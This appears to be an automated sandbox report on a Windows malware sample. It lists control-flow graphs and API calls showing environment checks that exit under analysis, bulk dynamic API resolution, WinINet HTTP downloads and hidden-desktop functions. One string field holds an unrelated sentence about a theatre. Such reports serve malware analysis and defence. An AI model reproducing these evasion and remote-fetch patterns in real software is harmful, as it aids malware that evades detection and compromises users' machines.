                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: a189ecc0bccb56762902944743c416a31782c1f8eeb02684495b386c6184d8f5
                          • Instruction ID: 623a6e4526a34e9545e88c055e97702d96c0e6960cd61260879b8ebe96bb708f
                          • Opcode Fuzzy Hash: a189ecc0bccb56762902944743c416a31782c1f8eeb02684495b386c6184d8f5
                          • Instruction Fuzzy Hash: B7A122B5611B00DFD754DF68ED49A263BB9F78C653300891AE996D33A4EB3CA800DF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 641bf0-641c0b call 622a90 call 646390 2146 641c0d 2141->2146 2147 641c1a-641c27 call 622930 2141->2147 2148 641c10-641c18 2146->2148 2151 641c35-641c63 2147->2151 2152 641c29-641c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 641c65-641c67 ExitProcess 2151->2156 2157 641c6d-641c7b GetSystemInfo 2151->2157 2152->2151 2158 641c85-641ca0 call 621030 call 6210c0 GetUserDefaultLangID 2157->2158 2159 641c7d-641c7f ExitProcess 2157->2159 2164 641ca2-641ca9 2158->2164 2165 641cb8-641cca call 642ad0 call 643e10 2158->2165 2164->2165 2166 641cb0-641cb2 ExitProcess 2164->2166 2171 641ce7-641d06 lstrlen call 622930 2165->2171 2172 641ccc-641cde call 642a40 call 643e10 2165->2172 2178 641d23-641d40 lstrlen call 622930 2171->2178 2179 641d08-641d0d 2171->2179 2172->2171 2183 641ce0-641ce1 ExitProcess 2172->2183 2186 641d42-641d44 2178->2186 2187 641d5a-641d7b call 642ad0 lstrlen call 622930 2178->2187 2179->2178 2181 641d0f-641d11 2179->2181 2181->2178 2184 641d13-641d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2188 641d46-641d54 lstrcpy lstrcat 2186->2188 2193 641d7d-641d7f 2187->2193 2194 641d9a-641db4 lstrlen call 622930 2187->2194 2188->2187 2193->2194 2195 641d81-641d85 2193->2195 2199 641db6-641db8 2194->2199 2200 641dce-641deb call 642a40 lstrlen call 622930 2194->2200 2195->2194 2197 641d87-641d94 lstrcpy lstrcat 2195->2197 2197->2194 2199->2200 2201 641dba-641dc8 lstrcpy lstrcat 2199->2201 2206 641ded-641def 2200->2206 2207 641e0a-641e0f 2200->2207 2201->2200 2206->2207 2208 641df1-641df5 2206->2208 2209 641e16-641e22 call 622930 2207->2209 2210 641e11 call 622a20 2207->2210 2208->2207 2211 641df7-641e04 lstrcpy lstrcat 2208->2211 2215 641e24-641e26 2209->2215 2216 641e30-641e66 call 622a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 641e28-641e2a lstrcpy 2215->2217 2228 641e8c-641ea0 CreateEventA call 641b20 call 63ffd0 2216->2228 2229 641e68-641e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 641ea5-641eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                          APIs
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290720), ref: 006463E9
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012907B0), ref: 00646402
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012906A8), ref: 0064641A
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012906C0), ref: 00646432
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01298830), ref: 0064644B
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012867C0), ref: 00646463
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01286A00), ref: 0064647B
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012907F8), ref: 00646494
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290558), ref: 006464AC
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290810), ref: 006464C4
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012906F0), ref: 006464DD
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01286740), ref: 006464F5
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290828), ref: 0064650D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00641C2F
                          • ExitProcess.KERNEL32 ref: 00641C67
                          • GetSystemInfo.KERNEL32(?), ref: 00641C71
                          • ExitProcess.KERNEL32 ref: 00641C7F
                            • Part of subcall function 00621030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00621046
                            • Part of subcall function 00621030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0062104D
                            • Part of subcall function 00621030: ExitProcess.KERNEL32 ref: 00621058
                            • Part of subcall function 006210C0: GlobalMemoryStatusEx.KERNEL32 ref: 006210EA
                            • Part of subcall function 006210C0: ExitProcess.KERNEL32 ref: 00621114
                          • GetUserDefaultLangID.KERNEL32 ref: 00641C8F
                          • ExitProcess.KERNEL32 ref: 00641CB2
                          • ExitProcess.KERNEL32 ref: 00641CE1
                          • lstrlen.KERNEL32(01298850), ref: 00641CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641D15
                          • lstrcat.KERNEL32(00000000,01298850), ref: 00641D1D
                          • lstrlen.KERNEL32(00654B98), ref: 00641D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641D48
                          • lstrcat.KERNEL32(00000000,00654B98), ref: 00641D54
                          • lstrlen.KERNEL32(00000000), ref: 00641D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641D94
                          • lstrlen.KERNEL32(00654B98), ref: 00641D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641DBC
                          • lstrcat.KERNEL32(00000000,00654B98), ref: 00641DC8
                          • lstrlen.KERNEL32(00000000), ref: 00641DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: d5a400cbd8be30b52c25204a6b9ebe7dcee96f7ab25a79ed1c8e9a5e9027c00a
                          • Instruction ID: 79307382397765baca29caccc0648666021001355309d4f1a11424ff2d52fe98
                          • Opcode Fuzzy Hash: d5a400cbd8be30b52c25204a6b9ebe7dcee96f7ab25a79ed1c8e9a5e9027c00a
                          • Instruction Fuzzy Hash: 7771B931941726EBD760ABB0EC4DBAE3A7BBF45712F044418F946AB291DF38D841CB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 626c40-626c64 call 622930 2237 626c66-626c6b 2234->2237 2238 626c75-626c97 call 624bc0 2234->2238 2237->2238 2239 626c6d-626c6f lstrcpy 2237->2239 2242 626caa-626cba call 622930 2238->2242 2243 626c99 2238->2243 2239->2238 2247 626cc8-626cf5 InternetOpenA StrCmpCA 2242->2247 2248 626cbc-626cc2 lstrcpy 2242->2248 2244 626ca0-626ca8 2243->2244 2244->2242 2244->2244 2249 626cf7 2247->2249 2250 626cfa-626cfc 2247->2250 2248->2247 2249->2250 2251 626d02-626d22 InternetConnectA 2250->2251 2252 626ea8-626ebb call 622930 2250->2252 2253 626ea1-626ea2 InternetCloseHandle 2251->2253 2254 626d28-626d5d HttpOpenRequestA 2251->2254 2259 626ec9-626ee0 call 622a20 * 2 2252->2259 2260 626ebd-626ebf 2252->2260 2253->2252 2256 626d63-626d65 2254->2256 2257 626e94-626e9e InternetCloseHandle 2254->2257 2261 626d67-626d77 InternetSetOptionA 2256->2261 2262 626d7d-626dad HttpSendRequestA HttpQueryInfoA 2256->2262 2257->2253 2260->2259 2263 626ec1-626ec3 lstrcpy 2260->2263 2261->2262 2265 626dd4-626de4 call 643d90 2262->2265 2266 626daf-626dd3 call 6471e0 call 622a20 * 2 2262->2266 2263->2259 2265->2266 2275 626de6-626de8 2265->2275 2277 626dee-626e07 InternetReadFile 2275->2277 2278 626e8d-626e8e InternetCloseHandle 2275->2278 2277->2278 2280 626e0d 2277->2280 2278->2257 2282 626e10-626e15 2280->2282 2282->2278 2283 626e17-626e3d call 647310 2282->2283 2286 626e44-626e51 call 622930 2283->2286 2287 626e3f call 622a20 2283->2287 2291 626e53-626e57 2286->2291 2292 626e61-626e8b call 622a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 626e59-626e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00626C6F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626CC2
                          • InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 00626CD5
                          • StrCmpCA.SHLWAPI(?,0129E4C8), ref: 00626CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,0129DD80,00000000,00000000,-00400100,00000000), ref: 00626D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00626D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00626D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00626DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00626DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00626E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00626E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00626E8E
                          • InternetCloseHandle.WININET(?), ref: 00626E98
                          • InternetCloseHandle.WININET(00000000), ref: 00626EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00626EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 61c230d8165b6ba1f53d72e68efef8005fe95786a00baeb5392ba03a96b1b1b5
                          • Instruction ID: 63fa0f2a60417eb5a3007c30f52f059b44905e404514368001477fae0f6b3f48
                          • Opcode Fuzzy Hash: 61c230d8165b6ba1f53d72e68efef8005fe95786a00baeb5392ba03a96b1b1b5
                          • Instruction Fuzzy Hash: 3A81BF71A40B26ABDB60DFA4EC45BEE77BAAF04701F000428F945E7380DB74AD048F94

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 624a60-624afc RtlAllocateHeap 2867 624b7a-624bbe VirtualProtect 2850->2867 2868 624afe-624b03 2850->2868 2869 624b06-624b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00624AA3
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00624BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 326afdc7ab01fa736ede3e32f7ad0bd3c5036247b7f59c6485f82db7f183aa9d
                          • Instruction ID: 58928c173a91f31a5541bed5cb5fe2f8457a956722d82d8c84e23aee83448dc4
                          • Opcode Fuzzy Hash: 326afdc7ab01fa736ede3e32f7ad0bd3c5036247b7f59c6485f82db7f183aa9d
                          • Instruction Fuzzy Hash: 0C31E718B8022A758620EBEF4CC7B9F7F56FF8576AF0340967C0857180CDA154A9CAA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00642A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00642A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 3df67415bb3e5d926c41bcc413c2ed12af0dc62dffe352ca993292dff01b7252
                          • Instruction ID: 1ffdde6fa9d99c01123712512cb71f13d362373cfff764ce8b25c0c5bdf82ac2
                          • Opcode Fuzzy Hash: 3df67415bb3e5d926c41bcc413c2ed12af0dc62dffe352ca993292dff01b7252
                          • Instruction Fuzzy Hash: A0F0B4B1A40704EBD700DF88DD49B9EBBBCF708B22F000226FA15E3280D778190486A1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 6466e0-6466e7 634 6466ed-646af9 GetProcAddress * 43 633->634 635 646afe-646b92 LoadLibraryA * 8 633->635 634->635 636 646b94-646c03 GetProcAddress * 5 635->636 637 646c08-646c0f 635->637 636->637 638 646c15-646ccd GetProcAddress * 8 637->638 639 646cd2-646cd9 637->639 638->639 640 646d4f-646d56 639->640 641 646cdb-646d4a GetProcAddress * 5 639->641 642 646d5c-646de4 GetProcAddress * 6 640->642 643 646de9-646df0 640->643 641->640 642->643 644 646df6-646f0b GetProcAddress * 12 643->644 645 646f10-646f17 643->645 644->645 646 646f8d-646f94 645->646 647 646f19-646f88 GetProcAddress * 5 645->647 648 646f96-646fbc GetProcAddress * 2 646->648 649 646fc1-646fc8 646->649 647->646 648->649 650 646ff5-646ffc 649->650 651 646fca-646ff0 GetProcAddress * 2 649->651 652 647002-6470e8 GetProcAddress * 10 650->652 653 6470ed-6470f4 650->653 651->650 652->653 654 6470f6-64714d GetProcAddress * 4 653->654 655 647152-647159 653->655 654->655 656 64716e-647175 655->656 657 64715b-647169 GetProcAddress 655->657 658 647177-6471ce GetProcAddress * 4 656->658 659 6471d3 656->659 657->656 658->659
                          APIs
                          • GetProcAddress.KERNEL32(75900000,012868E0), ref: 006466F5
                          • GetProcAddress.KERNEL32(75900000,01286900), ref: 0064670D
                          • GetProcAddress.KERNEL32(75900000,01298F88), ref: 00646726
                          • GetProcAddress.KERNEL32(75900000,01298FB8), ref: 0064673E
                          • GetProcAddress.KERNEL32(75900000,0129CFE0), ref: 00646756
                          • GetProcAddress.KERNEL32(75900000,0129CFB0), ref: 0064676F
                          • GetProcAddress.KERNEL32(75900000,0128B220), ref: 00646787
                          • GetProcAddress.KERNEL32(75900000,0129D070), ref: 0064679F
                          • GetProcAddress.KERNEL32(75900000,0129D0D0), ref: 006467B8
                          • GetProcAddress.KERNEL32(75900000,0129D028), ref: 006467D0
                          • GetProcAddress.KERNEL32(75900000,0129CF50), ref: 006467E8
                          • GetProcAddress.KERNEL32(75900000,01286940), ref: 00646801
                          • GetProcAddress.KERNEL32(75900000,01286980), ref: 00646819
                          • GetProcAddress.KERNEL32(75900000,01286860), ref: 00646831
                          • GetProcAddress.KERNEL32(75900000,012869C0), ref: 0064684A
                          • GetProcAddress.KERNEL32(75900000,0129D040), ref: 00646862
                          • GetProcAddress.KERNEL32(75900000,0129D058), ref: 0064687A
                          • GetProcAddress.KERNEL32(75900000,0128B108), ref: 00646893
                          • GetProcAddress.KERNEL32(75900000,01286A20), ref: 006468AB
                          • GetProcAddress.KERNEL32(75900000,0129D088), ref: 006468C3
                          • GetProcAddress.KERNEL32(75900000,0129D0A0), ref: 006468DC
                          • GetProcAddress.KERNEL32(75900000,0129CF68), ref: 006468F4
                          • GetProcAddress.KERNEL32(75900000,0129CFF8), ref: 0064690C
                          • GetProcAddress.KERNEL32(75900000,012866C0), ref: 00646925
                          • GetProcAddress.KERNEL32(75900000,0129D0B8), ref: 0064693D
                          • GetProcAddress.KERNEL32(75900000,0129CF20), ref: 00646955
                          • GetProcAddress.KERNEL32(75900000,0129CF38), ref: 0064696E
                          • GetProcAddress.KERNEL32(75900000,0129CF80), ref: 00646986
                          • GetProcAddress.KERNEL32(75900000,0129CFC8), ref: 0064699E
                          • GetProcAddress.KERNEL32(75900000,0129CF98), ref: 006469B7
                          • GetProcAddress.KERNEL32(75900000,0129D010), ref: 006469CF
                          • GetProcAddress.KERNEL32(75900000,0129CB00), ref: 006469E7
                          • GetProcAddress.KERNEL32(75900000,0129C920), ref: 00646A00
                          • GetProcAddress.KERNEL32(75900000,01299E08), ref: 00646A18
                          • GetProcAddress.KERNEL32(75900000,0129C9C8), ref: 00646A30
                          • GetProcAddress.KERNEL32(75900000,0129C9E0), ref: 00646A49
                          • GetProcAddress.KERNEL32(75900000,012866E0), ref: 00646A61
                          • GetProcAddress.KERNEL32(75900000,0129C9F8), ref: 00646A79
                          • GetProcAddress.KERNEL32(75900000,012867E0), ref: 00646A92
                          • GetProcAddress.KERNEL32(75900000,0129CA10), ref: 00646AAA
                          • GetProcAddress.KERNEL32(75900000,0129CA28), ref: 00646AC2
                          • GetProcAddress.KERNEL32(75900000,01286300), ref: 00646ADB
                          • GetProcAddress.KERNEL32(75900000,01286540), ref: 00646AF3
                          • LoadLibraryA.KERNEL32(0129CA58,0064051F), ref: 00646B05
                          • LoadLibraryA.KERNEL32(0129CA40), ref: 00646B16
                          • LoadLibraryA.KERNEL32(0129CAE8), ref: 00646B28
                          • LoadLibraryA.KERNEL32(0129C9B0), ref: 00646B3A
                          • LoadLibraryA.KERNEL32(0129CAB8), ref: 00646B4B
                          • LoadLibraryA.KERNEL32(0129CBA8), ref: 00646B5D
                          • LoadLibraryA.KERNEL32(0129CA70), ref: 00646B6F
                          • LoadLibraryA.KERNEL32(0129CBC0), ref: 00646B80
                          • GetProcAddress.KERNEL32(75FD0000,01286580), ref: 00646B9C
                          • GetProcAddress.KERNEL32(75FD0000,0129CAD0), ref: 00646BB4
                          • GetProcAddress.KERNEL32(75FD0000,012988A0), ref: 00646BCD
                          • GetProcAddress.KERNEL32(75FD0000,0129CB18), ref: 00646BE5
                          • GetProcAddress.KERNEL32(75FD0000,01286320), ref: 00646BFD
                          • GetProcAddress.KERNEL32(734B0000,0128B130), ref: 00646C1D
                          • GetProcAddress.KERNEL32(734B0000,01286340), ref: 00646C35
                          • GetProcAddress.KERNEL32(734B0000,0128B270), ref: 00646C4E
                          • GetProcAddress.KERNEL32(734B0000,0129CB90), ref: 00646C66
                          • GetProcAddress.KERNEL32(734B0000,0129C980), ref: 00646C7E
                          • GetProcAddress.KERNEL32(734B0000,01286360), ref: 00646C97
                          • GetProcAddress.KERNEL32(734B0000,01286660), ref: 00646CAF
                          • GetProcAddress.KERNEL32(734B0000,0129CBD8), ref: 00646CC7
                          • GetProcAddress.KERNEL32(763B0000,012863E0), ref: 00646CE3
                          • GetProcAddress.KERNEL32(763B0000,012864C0), ref: 00646CFB
                          • GetProcAddress.KERNEL32(763B0000,0129CB30), ref: 00646D14
                          • GetProcAddress.KERNEL32(763B0000,0129CB48), ref: 00646D2C
                          • GetProcAddress.KERNEL32(763B0000,01286560), ref: 00646D44
                          • GetProcAddress.KERNEL32(750F0000,0128B298), ref: 00646D64
                          • GetProcAddress.KERNEL32(750F0000,0128AF78), ref: 00646D7C
                          • GetProcAddress.KERNEL32(750F0000,0129CBF0), ref: 00646D95
                          • GetProcAddress.KERNEL32(750F0000,01286480), ref: 00646DAD
                          • GetProcAddress.KERNEL32(750F0000,012865C0), ref: 00646DC5
                          • GetProcAddress.KERNEL32(750F0000,0128AEB0), ref: 00646DDE
                          • GetProcAddress.KERNEL32(75A50000,0129CA88), ref: 00646DFE
                          • GetProcAddress.KERNEL32(75A50000,012862E0), ref: 00646E16
                          • GetProcAddress.KERNEL32(75A50000,01298820), ref: 00646E2F
                          • GetProcAddress.KERNEL32(75A50000,0129CC08), ref: 00646E47
                          • GetProcAddress.KERNEL32(75A50000,0129CAA0), ref: 00646E5F
                          • GetProcAddress.KERNEL32(75A50000,01286380), ref: 00646E78
                          • GetProcAddress.KERNEL32(75A50000,012864E0), ref: 00646E90
                          • GetProcAddress.KERNEL32(75A50000,0129CB60), ref: 00646EA8
                          • GetProcAddress.KERNEL32(75A50000,0129CB78), ref: 00646EC1
                          • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00646ED7
                          • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00646EEE
